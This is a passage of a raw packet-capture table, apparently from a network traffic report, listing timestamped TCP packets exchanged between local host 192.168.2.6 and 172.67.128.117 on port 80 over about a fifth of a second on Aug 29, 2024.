                                    Aug 29, 2024 12:02:35.926019907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926032066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926042080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926054001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926058054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926064014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926075935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926076889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926090002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926115036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926115036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926151037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926151991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926186085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926337957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926353931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926366091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926377058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926405907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926405907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926441908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926502943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926513910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926525116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926536083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926548004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926568985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926588058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926588058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926646948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926657915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926668882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926678896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926687002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926690102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926702976 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926731110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926731110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926832914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926845074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926856041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926867962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926879883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.926903963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926932096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.926979065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927014112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927181005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927195072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927206039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927217960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927231073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927237034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927237034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927242041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927253962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927264929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927275896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927280903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927280903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927288055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927297115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927299976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927311897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927354097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927354097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927660942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927674055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927716017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927833080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927850008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927862883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927877903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927881956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927895069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927903891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927908897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927925110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927939892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927946091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927946091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927982092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.927989006 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.927997112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928013086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928016901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928056002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928056002 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928102970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928117990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928131104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928152084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928152084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928170919 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928284883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928298950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928313971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928328037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928335905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928335905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928344011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928354025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928374052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928420067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928435087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928440094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928457975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928472996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928474903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928474903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928503036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928510904 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928510904 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928539038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928546906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928560972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928576946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928601027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.928736925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.928807020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.963274002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963298082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963309050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963320017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963387966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.963388920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.963432074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963443995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963455915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963468075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.963474989 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.963557005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015332937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015353918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015405893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015418053 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015429974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015440941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015439034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015450954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015463114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015480042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015480042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015517950 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015538931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015549898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015577078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015620947 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015736103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015748024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015758038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015769958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015774965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015783072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015794039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015794992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015805960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015816927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015829086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015835047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015841961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015856028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015866041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.015901089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.015901089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016072989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016087055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016098976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016112089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016144991 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016144991 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016248941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016261101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016271114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016283989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016299963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016299963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016328096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016426086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016438007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016448021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016463041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016495943 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016508102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016580105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016591072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016602039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016609907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016613960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016628027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016660929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016693115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016808987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016819954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016830921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016841888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016850948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016851902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016860008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016865969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.016880989 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.016902924 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017045975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017059088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017070055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017081976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017091990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017095089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017095089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017103910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017113924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017126083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017131090 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017159939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017246962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017261028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017266989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017272949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017283916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017328024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017328024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017388105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017400026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017411947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017425060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017469883 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017585039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017596006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017606974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017617941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017618895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017631054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017664909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017664909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017728090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017739058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017750978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017784119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017784119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018043995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018055916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018065929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018078089 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018090010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018100977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018111944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018116951 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018117905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018130064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018152952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018152952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018172979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018183947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018187046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018219948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018219948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018382072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018393040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018413067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018436909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018547058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018558979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018569946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018580914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018580914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018594027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018604994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018615961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018615961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018651009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018728971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018739939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018750906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018759966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018765926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018771887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018783092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018794060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018809080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018809080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018846035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018898964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018910885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018920898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018932104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018971920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019090891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019102097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019112110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019123077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019134045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019139051 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019165993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019184113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019289017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019299984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019310951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019323111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019330978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019336939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019339085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019347906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019355059 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019361019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019406080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019406080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054217100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054236889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054251909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054286003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054297924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054310083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054312944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054312944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054322004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054366112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054366112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105292082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105319023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105334044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105346918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105360031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105362892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105372906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105389118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105391979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105432034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105443001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105443001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105444908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105454922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105478048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105492115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105500937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105500937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105509043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105518103 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105521917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105549097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105549097 CEST4971780192.168.2.6172.67.128.117
